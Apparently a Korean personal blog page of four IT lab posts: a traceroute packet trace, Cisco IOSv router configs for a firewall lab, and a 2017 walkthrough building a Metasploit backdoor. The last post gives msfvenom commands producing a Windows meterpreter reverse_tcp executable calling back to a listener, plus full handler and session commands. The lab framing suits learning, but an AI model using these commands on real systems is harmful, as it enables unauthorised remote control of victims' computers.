실습/IT실습: 4개의 글

[IT실습] Traceroute 할때의 패킷은 어떤 모습일까 ?

Posted by nkjok
2022. 8. 22. 14:55 실습/IT실습
반응형

 

11939.045115 port3 in 192.168.10.100.60455 -> 200.1.1.2.33437: udp 32
11939.045277 port3 in 192.168.10.100.51098 -> 200.1.1.2.33438: udp 32
11939.045312 port3 in 192.168.10.100.48379 -> 200.1.1.2.33439: udp 32
11939.045337 port3 in 192.168.10.100.35204 -> 200.1.1.2.33440: udp 32
11939.045382 port2 out arp who-has 180.1.1.2 tell 180.1.1.1
11939.045434 port3 in 192.168.10.100.47496 -> 200.1.1.2.33441: udp 32
11939.045465 port3 in 192.168.10.100.55245 -> 200.1.1.2.33442: udp 32
11939.045501 port3 in 192.168.10.100.60610 -> 200.1.1.2.33443: udp 32
11939.045518 port3 in 192.168.10.100.42345 -> 200.1.1.2.33444: udp 32
11939.045536 port3 in 192.168.10.100.33374 -> 200.1.1.2.33445: udp 32
11939.045561 port3 in 192.168.10.100.33168 -> 200.1.1.2.33446: udp 32
11939.045576 port3 in 192.168.10.100.56045 -> 200.1.1.2.33447: udp 32
11939.045603 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.045634 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.045636 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.046266 port3 in 192.168.10.100.54057 -> 200.1.1.2.33448: udp 32
11939.046301 port3 in 192.168.10.100.53879 -> 200.1.1.2.33449: udp 32
11939.046328 port3 in 192.168.10.100.58879 -> 200.1.1.2.33450: udp 32
11939.046430 port3 in 192.168.10.100.34079 -> 200.1.1.2.33451: udp 32
11939.046459 port3 in 192.168.10.100.51415 -> 200.1.1.2.33452: udp 32
11939.046487 port3 in 192.168.10.100.49723 -> 200.1.1.2.33453: udp 32
11939.048053 port2 in arp reply 180.1.1.2 is-at 50:0:0:2:0:1
11939.048070 port2 out 180.1.1.1.35204 -> 200.1.1.2.33440: udp 32
11939.048103 port2 out 180.1.1.1.47496 -> 200.1.1.2.33441: udp 32
11939.048117 port2 out 180.1.1.1.55245 -> 200.1.1.2.33442: udp 32
11939.048119 port2 out 180.1.1.1.60610 -> 200.1.1.2.33443: udp 32
11939.048120 port2 out 180.1.1.1.42345 -> 200.1.1.2.33444: udp 32
11939.048121 port2 out 180.1.1.1.33374 -> 200.1.1.2.33445: udp 32
11939.048122 port2 out 180.1.1.1.33168 -> 200.1.1.2.33446: udp 32
11939.048122 port2 out 180.1.1.1.56045 -> 200.1.1.2.33447: udp 32
11939.048123 port2 out 180.1.1.1.54057 -> 200.1.1.2.33448: udp 32
11939.048123 port2 out 180.1.1.1.53879 -> 200.1.1.2.33449: udp 32
11939.048124 port2 out 180.1.1.1.58879 -> 200.1.1.2.33450: udp 32
11939.048124 port2 out 180.1.1.1.34079 -> 200.1.1.2.33451: udp 32
11939.048125 port2 out 180.1.1.1.51415 -> 200.1.1.2.33452: udp 32
11939.048126 port2 out 180.1.1.1.49723 -> 200.1.1.2.33453: udp 32
11939.051136 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.051157 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.051371 port3 in 192.168.10.100.48118 -> 200.1.1.2.33454: udp 32
11939.051404 port2 out 180.1.1.1.48118 -> 200.1.1.2.33454: udp 32
11939.053561 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.053575 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.053974 port3 in 192.168.10.100.41489 -> 200.1.1.2.33455: udp 32
11939.054014 port2 out 180.1.1.1.41489 -> 200.1.1.2.33455: udp 32
11939.055849 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.055858 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.056488 port3 in 192.168.10.100.37531 -> 200.1.1.2.33456: udp 32
11939.056521 port2 out 180.1.1.1.37531 -> 200.1.1.2.33456: udp 32
11939.056556 port3 in 192.168.10.100.49406 -> 200.1.1.2.33457: udp 32
11939.056570 port2 out 180.1.1.1.49406 -> 200.1.1.2.33457: udp 32
11939.056609 port3 in 192.168.10.100.35110 -> 200.1.1.2.33458: udp 32
11939.056627 port2 out 180.1.1.1.35110 -> 200.1.1.2.33458: udp 32
11944.048108 port3 in 192.168.10.100.58961 -> 200.1.1.2.33459: udp 32
11944.048158 port2 out 180.1.1.1.58961 -> 200.1.1.2.33459: udp 32
11944.048194 port3 in 192.168.10.100.41949 -> 200.1.1.2.33460: udp 32
11944.048207 port2 out 180.1.1.1.41949 -> 200.1.1.2.33460: udp 32
11944.048219 port3 in 192.168.10.100.55959 -> 200.1.1.2.33461: udp 32
11944.048252 port2 out 180.1.1.1.55959 -> 200.1.1.2.33461: udp 32
11944.048283 port3 in 192.168.10.100.40707 -> 200.1.1.2.33462: udp 32
11944.048293 port2 out 180.1.1.1.40707 -> 200.1.1.2.33462: udp 32
11944.048303 port3 in 192.168.10.100.54021 -> 200.1.1.2.33463: udp 32
11944.048320 port2 out 180.1.1.1.54021 -> 200.1.1.2.33463: udp 32
11944.048331 port3 in 192.168.10.100.53216 -> 200.1.1.2.33464: udp 32
11944.048338 port2 out 180.1.1.1.53216 -> 200.1.1.2.33464: udp 32
11944.048377 port3 in 192.168.10.100.41455 -> 200.1.1.2.33465: udp 32
11944.048398 port2 out 180.1.1.1.41455 -> 200.1.1.2.33465: udp 32
11944.048429 port3 in 192.168.10.100.52855 -> 200.1.1.2.33466: udp 32
11944.048449 port2 out 180.1.1.1.52855 -> 200.1.1.2.33466: udp 32
11944.048479 port3 in 192.168.10.100.56676 -> 200.1.1.2.33467: udp 32
11944.048529 port2 out 180.1.1.1.56676 -> 200.1.1.2.33467: udp 32
11944.048559 port3 in 192.168.10.100.33484 -> 200.1.1.2.33468: udp 32
11944.048568 port2 out 180.1.1.1.33484 -> 200.1.1.2.33468: udp 32
11944.048580 port3 in 192.168.10.100.58647 -> 200.1.1.2.33469: udp 32
11944.048605 port2 out 180.1.1.1.58647 -> 200.1.1.2.33469: udp 32
11944.050299 port3 out arp who-has 170.1.1.2 tell 170.1.1.1
11944.051642 port3 in 192.168.10.100.49797 -> 200.1.1.2.33470: udp 32
11944.051655 port2 out 180.1.1.1.49797 -> 200.1.1.2.33470: udp 32
11944.054320 port3 in 192.168.10.100.45788 -> 200.1.1.2.33471: udp 32
11944.054390 port2 out 180.1.1.1.45788 -> 200.1.1.2.33471: udp 32
11944.055664 port3 in 192.168.10.100.35648 -> 200.1.1.2.33472: udp 32
11944.055699 port2 out 180.1.1.1.35648 -> 200.1.1.2.33472: udp 32
11944.055732 port3 in 192.168.10.100.38351 -> 200.1.1.2.33473: udp 32
11944.055741 port2 out 180.1.1.1.38351 -> 200.1.1.2.33473: udp 32
11944.058429 port3 in 192.168.10.100.34689 -> 200.1.1.2.33474: udp 32
11944.058445 port2 out 180.1.1.1.34689 -> 200.1.1.2.33474: udp 32
11944.061171 port3 in arp reply 170.1.1.2 is-at 50:0:0:3:0:0
11949.050635 port3 in 192.168.10.100.55854 -> 200.1.1.2.33475: udp 32
11949.050722 port2 out 180.1.1.1.55854 -> 200.1.1.2.33475: udp 32
11949.050759 port3 in 192.168.10.100.56148 -> 200.1.1.2.33476: udp 32
11949.050770 port2 out 180.1.1.1.56148 -> 200.1.1.2.33476: udp 32
11949.050783 port3 in 192.168.10.100.57069 -> 200.1.1.2.33477: udp 32
11949.050794 port2 out 180.1.1.1.57069 -> 200.1.1.2.33477: udp 32
11949.050825 port3 in 192.168.10.100.37029 -> 200.1.1.2.33478: udp 32
11949.050850 port2 out 180.1.1.1.37029 -> 200.1.1.2.33478: udp 32
11949.050873 port3 in 192.168.10.100.35544 -> 200.1.1.2.33479: udp 32
11949.050894 port2 out 180.1.1.1.35544 -> 200.1.1.2.33479: udp 32
11949.050926 port3 in 192.168.10.100.52957 -> 200.1.1.2.33480: udp 32
11949.050937 port2 out 180.1.1.1.52957 -> 200.1.1.2.33480: udp 32
11949.050949 port3 in 192.168.10.100.46882 -> 200.1.1.2.33481: udp 32
11949.050965 port2 out 180.1.1.1.46882 -> 200.1.1.2.33481: udp 32
11949.050996 port3 in 192.168.10.100.60171 -> 200.1.1.2.33482: udp 32
11949.051017 port2 out 180.1.1.1.60171 -> 200.1.1.2.33482: udp 32
11949.051051 port3 in 192.168.10.100.41857 -> 200.1.1.2.33483: udp 32
11949.051060 port2 out 180.1.1.1.41857 -> 200.1.1.2.33483: udp 32
11949.051092 port3 in 192.168.10.100.54990 -> 200.1.1.2.33484: udp 32
11949.051100 port2 out 180.1.1.1.54990 -> 200.1.1.2.33484: udp 32
11949.051149 port3 in 192.168.10.100.50099 -> 200.1.1.2.33485: udp 32
11949.051170 port2 out 180.1.1.1.50099 -> 200.1.1.2.33485: udp 32
11949.052568 port3 in 192.168.10.100.55273 -> 200.1.1.2.33486: udp 32
11949.052582 port2 out 180.1.1.1.55273 -> 200.1.1.2.33486: udp 32
11949.055280 port3 in 192.168.10.100.55555 -> 200.1.1.2.33487: udp 32
11949.055337 port2 out 180.1.1.1.55555 -> 200.1.1.2.33487: udp 32
11949.056710 port3 in 192.168.10.100.39481 -> 200.1.1.2.33488: udp 32
11949.056736 port2 out 180.1.1.1.39481 -> 200.1.1.2.33488: udp 32
11949.056771 port3 in 192.168.10.100.49641 -> 200.1.1.2.33489: udp 32
11949.056790 port2 out 180.1.1.1.49641 -> 200.1.1.2.33489: udp 32
11949.058943 port3 in 192.168.10.100.34929 -> 200.1.1.2.33490: udp 32
11949.058970 port2 out 180.1.1.1.34929 -> 200.1.1.2.33490: udp 32
11954.055631 port3 in 192.168.10.100.56237 -> 200.1.1.2.33491: udp 32
11954.055667 port2 out 180.1.1.1.56237 -> 200.1.1.2.33491: udp 32
11954.055694 port3 in 192.168.10.100.54246 -> 200.1.1.2.33492: udp 32
11954.055702 port2 out 180.1.1.1.54246 -> 200.1.1.2.33492: udp 32
11954.056049 port3 in 192.168.10.100.57523 -> 200.1.1.2.33493: udp 32
11954.056061 port2 out 180.1.1.1.57523 -> 200.1.1.2.33493: udp 32
11954.056082 port3 in 192.168.10.100.59586 -> 200.1.1.2.33494: udp 32
11954.056090 port2 out 180.1.1.1.59586 -> 200.1.1.2.33494: udp 32
11954.056109 port3 in 192.168.10.100.57265 -> 200.1.1.2.33495: udp 32
11954.056128 port2 out 180.1.1.1.57265 -> 200.1.1.2.33495: udp 32
11954.056148 port3 in 192.168.10.100.44725 -> 200.1.1.2.33496: udp 32
11954.056155 port2 out 180.1.1.1.44725 -> 200.1.1.2.33496: udp 32
11954.056167 port3 in 192.168.10.100.44039 -> 200.1.1.2.33497: udp 32
11954.056173 port2 out 180.1.1.1.44039 -> 200.1.1.2.33497: udp 32
11954.056182 port3 in 192.168.10.100.60998 -> 200.1.1.2.33498: udp 32
11954.056201 port2 out 180.1.1.1.60998 -> 200.1.1.2.33498: udp 32
11954.056232 port3 in 192.168.10.100.44563 -> 200.1.1.2.33499: udp 32
11954.056241 port2 out 180.1.1.1.44563 -> 200.1.1.2.33499: udp 32
11954.056251 port3 in 192.168.10.100.52073 -> 200.1.1.2.33500: udp 32
11954.056269 port2 out 180.1.1.1.52073 -> 200.1.1.2.33500: udp 32
11954.056289 port3 in 192.168.10.100.34529 -> 200.1.1.2.33501: udp 32
11954.056306 port2 out 180.1.1.1.34529 -> 200.1.1.2.33501: udp 32
11954.056326 port3 in 192.168.10.100.38130 -> 200.1.1.2.33502: udp 32
11954.056345 port2 out 180.1.1.1.38130 -> 200.1.1.2.33502: udp 32
11954.056375 port3 in 192.168.10.100.33234 -> 200.1.1.2.33503: udp 32
11954.056425 port2 out 180.1.1.1.33234 -> 200.1.1.2.33503: udp 32
11954.058550 port3 in 192.168.10.100.60814 -> 200.1.1.2.33504: udp 32
11954.058563 port2 out 180.1.1.1.60814 -> 200.1.1.2.33504: udp 32
11954.058612 port3 in 192.168.10.100.45704 -> 200.1.1.2.33505: udp 32
11954.058623 port2 out 180.1.1.1.45704 -> 200.1.1.2.33505: udp 32
11954.060015 port3 in 192.168.10.100.52708 -> 200.1.1.2.33506: udp 32
11954.060031 port2 out 180.1.1.1.52708 -> 200.1.1.2.33506: udp 32
11959.062425 port3 in 192.168.10.100.60903 -> 200.1.1.2.33507: udp 32
11959.062487 port2 out 180.1.1.1.60903 -> 200.1.1.2.33507: udp 32
11959.062512 port3 in 192.168.10.100.38006 -> 200.1.1.2.33508: udp 32
11959.062520 port2 out 180.1.1.1.38006 -> 200.1.1.2.33508: udp 32
11959.062531 port3 in 192.168.10.100.54241 -> 200.1.1.2.33509: udp 32
11959.062536 port2 out 180.1.1.1.54241 -> 200.1.1.2.33509: udp 32
11959.062591 port3 in 192.168.10.100.45598 -> 200.1.1.2.33510: udp 32
11959.062624 port2 out 180.1.1.1.45598 -> 200.1.1.2.33510: udp 32
11959.062665 port3 in 192.168.10.100.33583 -> 200.1.1.2.33511: udp 32
11959.062675 port2 out 180.1.1.1.33583 -> 200.1.1.2.33511: udp 32
11959.062706 port3 in 192.168.10.100.53161 -> 200.1.1.2.33512: udp 32
11959.062715 port2 out 180.1.1.1.53161 -> 200.1.1.2.33512: udp 32
11959.062753 port3 in 192.168.10.100.48440 -> 200.1.1.2.33513: udp 32
11959.062762 port2 out 180.1.1.1.48440 -> 200.1.1.2.33513: udp 32
11959.062773 port3 in 192.168.10.100.37079 -> 200.1.1.2.33514: udp 32
11959.062777 port2 out 180.1.1.1.37079 -> 200.1.1.2.33514: udp 32
11959.062808 port3 in 192.168.10.100.36212 -> 200.1.1.2.33515: udp 32
11959.062829 port2 out 180.1.1.1.36212 -> 200.1.1.2.33515: udp 32
11959.062866 port3 in 192.168.10.100.50254 -> 200.1.1.2.33516: udp 32
11959.062874 port2 out 180.1.1.1.50254 -> 200.1.1.2.33516: udp 32
11959.062914 port3 in 192.168.10.100.56743 -> 200.1.1.2.33517: udp 32
11959.062940 port2 out 180.1.1.1.56743 -> 200.1.1.2.33517: udp 32
11959.062973 port3 in 192.168.10.100.46998 -> 200.1.1.2.33518: udp 32
11959.062991 port2 out 180.1.1.1.46998 -> 200.1.1.2.33518: udp 32
11959.063004 port3 in 192.168.10.100.59546 -> 200.1.1.2.33519: udp 32
11959.063052 port2 out 180.1.1.1.59546 -> 200.1.1.2.33519: udp 32
11959.063083 port3 in 192.168.10.100.45005 -> 200.1.1.2.33520: udp 32
11959.063103 port2 out 180.1.1.1.45005 -> 200.1.1.2.33520: udp 32
11959.063135 port3 in 192.168.10.100.49054 -> 200.1.1.2.33521: udp 32
11959.063143 port2 out 180.1.1.1.49054 -> 200.1.1.2.33521: udp 32
11959.063155 port3 in 192.168.10.100.38388 -> 200.1.1.2.33522: udp 32
11959.063174 port2 out 180.1.1.1.38388 -> 200.1.1.2.33522: udp 32
11964.068599 port3 in 192.168.10.100.34797 -> 200.1.1.2.33523: udp 32
11964.068636 port2 out 180.1.1.1.34797 -> 200.1.1.2.33523: udp 32
11974.010136 port2 out arp who-has 180.1.1.2 tell 180.1.1.1
11974.012237 port2 in arp reply 180.1.1.2 is-at 50:0:0:2:0:1
12003.992146 port1 in 192.168.199.1.138 -> 192.168.199.255.138: udp 201

 

약간 미제...........

반응형

[IT실습] IT 실습 환경 구현 -! (2)

Posted by nkjok
2022. 8. 21. 23:23 실습/IT실습
반응형

구성도 화면

 

1) Client 

- 출발지 역할의 단말 PC

Client GUI 화면

 

2) iL3 

- 방화벽 기준 내부에 있는 라우터 

iL3#show run
Building configuration...

Current configuration : 3175 bytes
!
! Last configuration change at 07:00:30 UTC Sun Aug 21 2022
!
version 15.2
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
service compress-config
!
hostname iL3
!
boot-start-marker
boot-end-marker
!
no aaa new-model
!
ip cef
no ipv6 cef
!
spanning-tree mode pvst
spanning-tree extend system-id
!
vlan internal allocation policy ascending
!
interface GigabitEthernet0/0
 no switchport
 ip address 170.1.1.2 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/1
 no switchport
 ip address 192.168.10.254 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet0/3
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/0
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/1
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/3
 media-type rj45
 negotiation auto
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
!
ip route 180.1.1.0 255.255.255.0 170.1.1.1
ip route 192.168.1.0 255.255.255.0 170.1.1.1
ip route 200.1.1.0 255.255.255.0 170.1.1.1
!
control-plane
!
banner exec ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner incoming ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner login ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
!
line con 0
line aux 0
line vty 0 4
!
end

 

 

3) Firewall

- 패킷의 허용 여부를 정책으로 지정할 수 있는 장비

Firewall 정책 화면

 

4) eL3

- 방화벽 기준 외부에 있는 라우터

eL3#show run
Building configuration...

Current configuration : 3185 bytes
!
! Last configuration change at 06:45:31 UTC Sun Aug 21 2022
!
version 15.2
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
service compress-config
!
hostname eL3
!
boot-start-marker
boot-end-marker
!
no aaa new-model
!
ip cef
no ipv6 cef
!
spanning-tree mode pvst
spanning-tree extend system-id
!
vlan internal allocation policy ascending
!
interface GigabitEthernet0/0
 no switchport
 ip address 200.1.1.254 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/1
 no switchport
 ip address 180.1.1.2 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet0/3
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/0
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/1
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/3
 media-type rj45
 negotiation auto
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
!
ip route 170.1.1.0 255.255.255.0 180.1.1.1
ip route 192.168.1.0 255.255.255.0 180.1.1.1
ip route 192.168.10.0 255.255.255.0 180.1.1.1
!
control-plane
!
banner exec ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner incoming ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner login ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
!
line con 0
line aux 0
line vty 0 4
 login
!
end

 

5) Server

-  목적지 역할의 단말 PC

Server GUI 화면

반응형

[IT실습] IT 실습 환경 구현 -! (1)

Posted by nkjok
2022. 8. 21. 21:03 실습/IT실습
반응형

 

서버도 있고, 방화벽도 있고, L3 스위치도 있다. 테스트 환경은 완성했으니, 테스트만 하면 된다.

반응형

[IT실습] Reverse TCP를 이용한 백도어[backdoor] 실습

Posted by nkjok
2017. 11. 30. 18:21 실습/IT실습
반응형

 

요약
 인증되지 않은 사용자에 의해 컴퓨터의 기능이 무단으로 사용될 수 있도록 컴퓨터에 몰래 설치된 통신 연결 기능을 말한다.

정상적인 인증 절차를 거치지 않고, 컴퓨터와 암호 시스템 등에 접근할 수 있도록 하는 방법이다. 백도어는 주로 설계 및 개발 단계에 의도적으로 심어지는 것이지만, 작동 중인 컴퓨터에 존재하는 보안 취약점을 통해 전송된 소프트웨어(트로이목마Trojan Horse 등)에 의해 만들어지기도 한다. 넓은 의미로는 기능상의 결함으로 인해 원래 허가되지 않은 통신 및 조작을 입력 받는 보안 구멍(hole)도 포함된다. 프로그램에 부분적으로 숨겨진 형태 혹은 독립적인 소프트웨어 형태, 하드웨어 특징 형태로 숨겨져 있을 수도 있다.

설계 및 개발 단계에 포함되는 백도어의 경우, 네트워크 장비 라우터와 방화벽에 개발 단계에서 테스트를 위해 포함되었던 백도어 형태의 기능이 제품 출시 단계에서 제거되지 않고 출하되어, 이를 발견한 사용자가 악용하는 경우가 있다. 또한 컴퓨터 프로그램 개발자에 의해 프로그램에 백도어가 의도적으로 내장되는 경우가 있으며, 미국에서는 대부분의 통신 기기에 미리 정부 기관으로부터의 접근을 허용하는 백도어가 설치되어 있다. 이를 이용한 도청은 법적 절차를 필요로 하지만, 운영 방법은 불투명하다. 의도하지 않은 개발 단계의 백도어는 주로 운영체제 등의 프로그램이 설계 및 개발 상의 실수로 보안 구멍을 가지는 경우가 있다.

이러한 백도어를 예방하기 위해서는 운영체제 및 소프트웨어 업데이트를 통해 보안 취약점을 제거하는 것이 효과적이다. 안티바이러스 소프트웨어는 트로이 목마와 같은 대부분의 백도어 프로그램을 발견하고 제거 및 비활성화 하는 기능을 가지고 있으며, 스파이웨어 제거 소프트웨어 또한 개인정보를 유출시키는 스파이웨어류의 백도어를 제거하는 데 도움이 된다.

[네이버 지식백과] 백도어 [backdoor] (두산백과)

 

 

 

실습 준비물 : 윈도우7 , 리눅스(데비안계열) , metasploit

 본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

리눅스에서 metasploit 파일을 구해서 설치한다. 

설치 명령어 : dpkg -i metasploit*

 

 

 

 

 

msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

백도어 파일을 생성해준다음에 msf콘솔을 실행해준다

-l  을 이용해 페이로드 종류를 확인 해볼 수 있다

 

 

 

msfconsole 명령어를 통해 콘솔을 실행한다 

 

 

 

 

 

핸들러 정의를 해주고 세션을 확인해보면 현재는 연결된 세션이 없는 것을 확인할 수 있다

 

 

 

 

 

 

이제 테스트 할 윈도우에서 조금 전에 만들어준 백도어 파일을 실행하면 ~

 

 

 

 

 

 

세션이 연결 된 것을 확인 할 수 있다. mkdir Test 라고 입력하면 ~~~

 

 

 

 

 

 

폴더가 생성 된 것을 확인 할 수 있다.

 

 

 

 

 

 

백도어 (Backdoor)

 

msfvenom설치

metasploit-framework_4.16.16+20171109102928.git.1.c5fd027_1rapid7-1_i386(32bit) 

파일구해서 dpkg -i 로 설치하면됨 (https://apt.metasploit.com/)

 

msfvenom -l  페일로드 종류확인

 

msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

 

 

 

msfconsole  콘솔실행

use exploit/multi/handler  핸들러테이블 불러오는

set payload windows/meterpreter/reverse_tcp  만든 페이로드와 똑같게

set lhost 192.168.0.12     자신의 IP

set lport 4444             사용할 포트

set exitonsession false    세션을 백그라운드 동작 (해커의)

exploit -j                 핸들러 실행

sessions                   세션 View (연결된 세션 보기)

sessions -i 1              세션과 연결시키기 (세션에서 번호확인하고)

이제 help 쳐보면 할수 있는 커맨드들이 나옴 

예) shutdown (윈도우가 꺼진다)

 

 

 

 

 

 

 

반응형